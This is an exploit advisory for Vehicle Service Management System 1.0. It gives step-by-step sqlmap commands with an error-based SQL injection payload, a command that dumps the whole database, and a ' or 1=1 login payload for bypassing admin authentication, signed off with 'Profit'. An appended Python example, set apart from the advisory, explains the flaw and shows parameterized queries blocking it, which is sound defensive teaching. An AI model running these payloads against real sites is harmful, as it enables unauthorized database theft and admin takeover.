Authored by Richard Jones

Vehicle Service Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities, one of which allows for authentication bypass.

# Exploit Title: Vehicle Service Management 1.0 - SQL Injection Error Based
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage:
# Software Link:
# Version: v1.0
# Tested on: Windows 10

Step 1 - Open sqlmap
Step 2 – Enter the payload string for sqlmap (edit localhost to site address)
Step 3 - Dump database info.

SQLMAP Command:

sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --technique=E


Parameter: id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(8850=8850,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bdrq&category_id=2&owner_name=aa&contact=aa&[]=3&service_type=Pick Up&pickup_address=aa

Step 3:

Dump the entire database.

sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --dump

# Exploit Title: Vehicle Service Management 1.0 - SQL Authentication Bypass
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage:
# Software Link:
# Version: v1.0
# Tested on: Windows 10

Step 1 - Go to http://site/admin/login.php (to login)
Step 2 – Enter the payload below for username and password
Step 3 - Login as admin!


' or 1=1-- -

# Profit
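
Why the login payload above succeeds, and the query form that stops it, as an added example that is not part of the advisory or the vendor's code. It assumes the login check builds its SQL by string concatenation and uses an in-memory SQLite database as a stand-in for the application's MySQL back end; the table, columns, credentials and function names are hypothetical.

```python
import sqlite3

PAYLOAD = "' or 1=1-- -"  # the string given in the advisory


def make_db():
    # Constructed stand-in for the application's user table (schema is an assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Constructed credentials; password hashing is omitted to keep the focus
    # on how the query text is built.
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'constructed-secret')")
    return db


def login_concatenated(db, username, password):
    # Vulnerable pattern: input is pasted into the SQL text, so a quote in the
    # input closes the string literal and the remainder is parsed as SQL.
    # With PAYLOAD the statement becomes
    #   ... WHERE username = '' or 1=1-- -' AND password = ...
    # and everything after "--" is a comment, so the password test never runs.
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    # Hardened pattern: placeholders bind the input as values, so quotes and
    # comment markers are compared as literal characters, never parsed.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    for name, check in (("concatenated", login_concatenated),
                        ("parameterized", login_parameterized)):
        print(name, "payload accepted:", check(db, PAYLOAD, PAYLOAD))
        print(name, "valid login accepted:", check(db, "admin", "constructed-secret"))
```

The same binding applies to the id parameter of the save_request endpoint: a bound value cannot alter the statement, which removes the error-based injection as well.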